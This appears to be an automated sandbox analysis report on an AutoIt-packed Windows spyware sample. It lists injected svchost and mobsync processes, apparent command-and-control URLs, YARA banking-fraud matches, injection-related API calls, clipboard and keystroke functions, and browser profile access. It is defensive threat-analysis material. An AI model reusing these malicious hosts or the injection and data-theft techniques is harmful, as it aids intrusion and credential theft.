                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:30:39 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://bloodbalancecaps.shop/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 15190Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 5d 97 e3 46 92 25 f8 9c f1 2b 5c cc 23 05 a9 a2 93 e0 57 7c 80 c1 a8 92 52 52 b7 66 aa 5a 75 4a aa e9 9d 91 b4 39 0e c0 00 78 86 c3 1d e5 ee 20 83 c9 8e 1f d3 67 1e f6 69 9f f6 ec cb be ea 8f ad 39 c0 ef 00 19 8c c8 e8 ae e9 66 04 41 87 b9 d9 b5 6b d7 ee cd 67 df fc f0 ee a7 ff fe e7 6f 49 6a 33 71 7b 76 e3 7e 88 60 32 99 34 72 4b ff fc 53 c3 c5 80 45 b7 67 6f 6e 32 b0 8c 84 29 d3 06 ec a4 f1 d7 9f be a3 57 0d d2 5d df 48 96 c1 a4 31 e5 30 cb 95 b6 0d 12 2a 69 41 62 e6 8c 47 36 9d 44 30 e5 21 d0 f2 a5 4d b8 e4 96 33 41 4d c8 04 4c 7a 25 ce 16 cc b9 56 81 b2 e6 7c 0d 72 9e b1 7b ca 33 96 00 cd 35 b8 26 be 60 3a 81 f3 8a 80 b1 73 01 b7 3c 4b 7c 6e 9a 3f 1b fe 11 cc a4 c1 0a ab 1a 84 ff da 26 55 e4 ff ac 42 6d 17 6b 91 45 89 cd b8 a4 5c 5a cd a5 e1 21 75 69 3e 19 78 9e 97 df 93 de a8 fc 79 b8 e9 56 e8 d8 c6 72 8b 87 3f ff f6 af 09 97 c8 f4 b7 ff a5 08 48 07 a3 59 c4 6e ba d5 f5 d9 8d e0 f2 8e 68 10 93 f3 48 1a c7 37 06 1b a6 e7 24 c5 d3 e4 bc db 0d 84 52 51 c0 50 e6 10 42 96 9b 8e 49 55 5e 4e b2 29 6d 30 61 41 4b 66 a1 41 ec 3c 47 65 59 9e 0b 1e 32 cb 95 ec 6a 63 7e 77 9f 09 bc 72 2d 27 0d f2 85 66 7f 2b d4 98 7c 07 10 35 aa 46 8d d4 da dc f8 07 da 75 63 cc ec 36 5e ad 29 89 00 05 cd 70 57 bf fd ab e6 ca 9c 46 02 2b 5c 89 d9 66 63 42 cd 73 7b 7b 36 e3 32 52 b3 ce fb 59 0e 99 fa c0 7f 04 6b b9 4c 0c 99 90 45 23 60 06 fe aa 45 c3 5f e2 ff d2 fd a5 6b 3a b3 8e d2 c9 2f dd d2 26 e6 17 04 d7 f0 4b b7 2c fe a5 db 1b 75 bc ce e0 97 ee 65 ff fe b2 ff 4b b7 d1 
6e c0 bd c5 fa 4e 2e 13 7c 31 d3 e4 65 78 58 58 a2 e1 ef b7 15 20 9e dc bb 2a 74 08 0d 7f d1 40 7f a0 80 65 d9 12 bf 84 af 15 e4 97 ee 2c 47 3f 86 a2 88 5c c7 0f a6 0c 94 b5 14 17 04 38 76 27 e3 b2 f3 c1 fc 7e 0a 7a 72 d1 b9 ec f4 1a 0f 0f e3 b3 ee 97 9f 91 9f 52 6e 48 cc 05 10 fc 75 4e a7 09 48 d0 d8 3b 22 5f 76 cf 3e 8b 0b 19 ba 45 36 79 5b b6 16 53 a6 89 6a 9b 36 8c 57 71 12 36 a1 b5 b0 7a 5e de d9 c9 c2 14 79 ae b4 fd 09 8c 35 3e b4 2d cf f0 c4 b2 dc 6f 4a 98 91 6f 10 b8 d5 99 32 51 c0 0f 71 b3 f5 30 36 60 0c c2 fc 68 95 46 c1 3a 06 ec f7 38 76 53 b5 ff cb 8f 3f fc 53 c7 58 8d eb e3 f1 bc 69 5b ad 07 54 24 4c 5d bb 87 87 75 fb bc 89 3d 1c 35 e8 84 38 aa fe 0b 84 b6 e9 b5 bd 36 be 33 39 65 b8 10 1e d9 74 f3 9a 02 4f 52 db c2 00 4e 2d 7e c2 85 36 2d a6 7b ad 71 35 80 63 f9 57 2e ed a0 ff 95 d6 6c de 84 4e 82 9c dc 36 91 3b 3b 05 ba 13 61 62 Data Ascii: ]F%+\#W|RRfZuJ9x gi9fAkgoIj3q{v~`24rKSEgon2)W]H10*
                Source: mobsync.exe, 00000006.00000002.3901773244.00000000055B6000.00000004.10000000.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.0000000002DB6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://aballanet.cat/6xrr/?DzLTc=HxJAUmNG5a
                Source: WafZCahkNS.exe, 00000008.00000002.3900807992.00000000022D2000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.bloodbalancecaps.shop
                Source: WafZCahkNS.exe, 00000008.00000002.3900807992.00000000022D2000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.bloodbalancecaps.shop/r9qi/
                Source: mobsync.exe, 00000006.00000002.3901773244.00000000058DA000.00000004.10000000.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.00000000030DA000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.canadavinreport.site/g3h7/?DzLTc=dyqW
                Source: mobsync.exe, 00000006.00000002.3901773244.0000000005424000.00000004.10000000.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.0000000002C24000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1965350475.0000000000BD4000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.litespeedtech.com/error-page
                Source: WafZCahkNS.exe, 00000008.00000002.3901668653.0000000002F48000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.madhf.tech/0mwe/?DzLTc=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY
                Source: mobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: mobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: mobsync.exe, 00000006.00000002.3901773244.0000000006246000.00000004.10000000.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.0000000003A46000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: mobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: mobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: mobsync.exe, 00000006.00000002.3901773244.0000000005D90000.00000004.10000000.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.0000000003590000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://down-sz.trafficmanager.net/?hh=
                Source: mobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: mobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: mobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: WafZCahkNS.exe, 00000008.00000002.3901668653.0000000003BD8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://keyq.top/$
                Source: mobsync.exe, 00000006.00000002.3899096271.0000000002E43000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: mobsync.exe, 00000006.00000002.3899096271.0000000002E43000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: mobsync.exe, 00000006.00000003.1854871931.0000000007AA8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: mobsync.exe, 00000006.00000002.3899096271.0000000002E43000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: mobsync.exe, 00000006.00000002.3899096271.0000000002E43000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033y7
                Source: mobsync.exe, 00000006.00000002.3899096271.0000000002E43000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033K
                Source: mobsync.exe, 00000006.00000002.3899096271.0000000002E43000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: mobsync.exe, 00000006.00000002.3899096271.0000000002E43000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: mobsync.exe, 00000006.00000002.3904569653.0000000007820000.00000004.00000800.00020000.00000000.sdmp, mobsync.exe, 00000006.00000002.3901773244.00000000063D8000.00000004.10000000.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.0000000003BD8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://playchill.top/api/axgames/request?domain=$
                Source: mobsync.exe, 00000006.00000002.3904569653.0000000007820000.00000004.00000800.00020000.00000000.sdmp, mobsync.exe, 00000006.00000002.3901773244.00000000063D8000.00000004.10000000.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.0000000003BD8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.js
                Source: mobsync.exe, 00000006.00000002.3901773244.000000000656A000.00000004.10000000.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.0000000003D6A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.cstrategy.online/zz3m/?DzLTc=p4da2npHVYx4RJTvd9az3TD7
                Source: mobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_00406B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, | 0_2_00406B0C
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_00406D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, | 0_2_00406D07
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_00406B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, | 0_2_00406B0C
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003F2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, | 0_2_003F2B37
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_0041F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, | 0_2_0041F7FF

                E-Banking Fraud

                barindex
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000008.00000002.3900807992.0000000002280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3898728526.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1668607265.00000000033A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3898911867.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1668177200.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3899007570.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1669021668.0000000005A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.3900792299.0000000004940000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: This is a third-party compiled AutoIt script.0_2_003B3D19
                Source: qbSIgCrCgw.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: qbSIgCrCgw.exe, 00000000.00000000.1431002540.000000000045E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_48752f60-d
                Source: qbSIgCrCgw.exe, 00000000.00000000.1431002540.000000000045E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: >SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_dab48205-8
                Source: qbSIgCrCgw.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e46f6e01-6
                Source: qbSIgCrCgw.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_1d95702e-b
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042C483 NtClose
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572B60 NtClose, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572DF0 NtQuerySystemInformation, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035735C0 NtCreateMutant, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03574340 NtSetContextThread
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03574650 NtSuspendThread
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572BF0 NtAllocateVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572BE0 NtQueryValueKey
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572BA0 NtEnumerateValueKey
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572AD0 NtReadFile
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572AF0 NtWriteFile
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572F30 NtCreateSection
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572FE0 NtCreateFile
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572FB0 NtResumeThread
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572EE0 NtQueueApcThread
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572E80 NtReadVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572D10 NtMapViewOfSection
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572D30 NtUnmapViewOfSection
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572DD0 NtDelayExecution
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572C70 NtFreeVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572C60 NtCreateKey
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572CA0 NtQueryInformationToken
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03573010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03573090 NtSetValueKey
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035739B0 NtGetContextThread
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03573D70 NtOpenThread
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03573D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A84650 NtSuspendThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A84340 NtSetContextThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A82CA0 NtQueryInformationToken, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A82C60 NtCreateKey, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A82C70 NtFreeVirtualMemory, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A82DF0 NtQuerySystemInformation, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A82DD0 NtDelayExecution, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A82D30 NtUnmapViewOfSection, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A82D10 NtMapViewOfSection, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A82EE0 NtQueueApcThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A82FB0 NtResumeThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A82FE0 NtCreateFile, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A82F30 NtCreateSection, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A82AF0 NtWriteFile, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A82AD0 NtReadFile, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A82B60 NtClose, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A835C0 NtCreateMutant, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A839B0 NtGetContextThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A82CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A82CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A82C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A82DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A82D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A82EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A82E80 NtReadVirtualMemory
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A82E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A82FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A82F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A82F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A82AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A82BA0 NtEnumerateValueKey
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A82B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A82BE0 NtQueryValueKey
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A82BF0 NtAllocateVirtualMemory
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A83090 NtSetValueKey
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A83010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A83D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_04A83D70 NtOpenThread
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_02A59270 NtReadFile
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_02A59370 NtDeleteFile
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_02A59100 NtCreateFile
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 6_2_02A59410 NtClose
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe Code function: 0_2_003F6606: CreateFileW, DeviceIoControl, CloseHandle
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe Code function: 0_2_003EACC5 _memset, DuplicateTokenEx, CloseHandle, OpenWindowStationW, GetProcessWindowStation, SetProcessWindowStation, OpenDesktopW, _wcscpy, LoadUserProfileW, CreateEnvironmentBlock, CreateProcessAsUserW, UnloadUserProfile, CloseWindowStation, CloseDesktop, SetProcessWindowStation, CloseHandle, DestroyEnvironmentBlock
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe Code function: 0_2_003F79D3 ExitWindowsEx, InitiateSystemShutdownExW, SetSystemPowerState
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 035AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03587E54 appears 101 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0352B970 appears 275 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03575130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 035BF290 appears 105 times
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: String function: 003D6AC0 appears 42 times
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: String function: 003DF8A0 appears 35 times
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: String function: 003CEC2F appears 68 times
                Source: C:\Windows\SysWOW64\mobsync.exe | Code function: String function: 04A97E54 appears 111 times
                Source: C:\Windows\SysWOW64\mobsync.exe | Code function: String function: 04ACF290 appears 105 times
                Source: C:\Windows\SysWOW64\mobsync.exe | Code function: String function: 04A85130 appears 58 times
                Source: C:\Windows\SysWOW64\mobsync.exe | Code function: String function: 04A3B970 appears 280 times
                Source: C:\Windows\SysWOW64\mobsync.exe | Code function: String function: 04ABEA12 appears 86 times
                Source: qbSIgCrCgw.exe, 00000000.00000003.1441550593.0000000003733000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs qbSIgCrCgw.exe
                Source: qbSIgCrCgw.exe, 00000000.00000003.1441720418.00000000038DD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs qbSIgCrCgw.exe
                Source: qbSIgCrCgw.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@14/13
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003FCE7A GetLastError,FormatMessageW, 0_2_003FCE7A
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003EAB84 AdjustTokenPrivileges,CloseHandle, 0_2_003EAB84
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003EB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_003EB134
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003FE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_003FE1FD
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003F6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle, 0_2_003F6532
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_0040C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket, 0_2_0040C18C
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003B406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_003B406B
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | File created: C:\Users\user\AppData\Local\Temp\aut9FD0.tmp
                Source: qbSIgCrCgw.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
